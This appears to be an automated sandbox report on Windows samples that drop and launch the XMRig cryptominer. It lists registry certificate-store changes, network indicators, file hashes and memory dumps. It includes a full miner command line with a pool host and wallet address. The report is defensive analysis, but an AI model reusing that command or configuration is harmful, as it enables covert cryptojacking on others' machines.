| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4948 wrote to memory of 3580 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4948 wrote to memory of 3580 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3580-16-0x000001EC103C0000-0x000001EC103E0000-memory.dmp
memory/3580-17-0x000001EC11BC0000-0x000001EC11BE0000-memory.dmp
memory/3580-18-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-20-0x000001EC11C00000-0x000001EC11C20000-memory.dmp
memory/3580-19-0x000001EC11BE0000-0x000001EC11C00000-memory.dmp
memory/3580-21-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-22-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-23-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-24-0x000001EC11BE0000-0x000001EC11C00000-memory.dmp
memory/3580-25-0x000001EC11C00000-0x000001EC11C20000-memory.dmp
memory/3580-26-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-27-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-28-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-29-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-30-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-31-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-32-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-33-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-34-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-35-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-36-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-37-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-38-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-39-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-40-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-41-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-42-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-43-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-44-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-45-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-46-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-47-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-48-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-49-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-50-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-51-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-52-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-53-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-54-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-55-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-56-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-57-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-58-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-59-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-60-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-61-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-62-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-63-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-64-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-65-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-66-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-67-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-68-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-69-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-70-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-71-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-72-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-73-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-74-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-75-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-76-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-77-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-78-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-79-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-80-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-81-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-82-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-83-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
memory/3580-84-0x00007FF7345E0000-0x00007FF7350E3000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:08
Platform
win10v2004-20240508-en
Max time kernel
1800s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1476 wrote to memory of 3764 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1476 wrote to memory of 3764 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3764-16-0x00000146FECA0000-0x00000146FECC0000-memory.dmp
memory/3764-17-0x00000146FECE0000-0x00000146FED00000-memory.dmp
memory/3764-18-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-20-0x00000146FED20000-0x00000146FED40000-memory.dmp
memory/3764-19-0x00000146FED00000-0x00000146FED20000-memory.dmp
memory/3764-21-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-22-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-23-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-25-0x00000146FED20000-0x00000146FED40000-memory.dmp
memory/3764-24-0x00000146FED00000-0x00000146FED20000-memory.dmp
memory/3764-26-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-27-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-28-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-29-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-30-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-31-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-32-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-33-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-34-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-35-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-36-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-37-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-38-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-39-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-40-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-41-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-42-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-43-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-44-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-45-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-46-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-47-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-48-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-49-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-50-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-51-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-52-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-53-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-54-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-55-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-56-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-57-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-58-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-59-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-60-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-61-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-62-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-63-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-64-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-65-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-66-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-67-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-68-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-69-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-70-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-71-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-72-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-73-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-74-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-75-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-76-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-77-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-78-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-79-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-80-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-81-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-82-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-83-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
memory/3764-84-0x00007FF6E3550000-0x00007FF6E4053000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:08
Platform
win10v2004-20240426-en
Max time kernel
1790s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
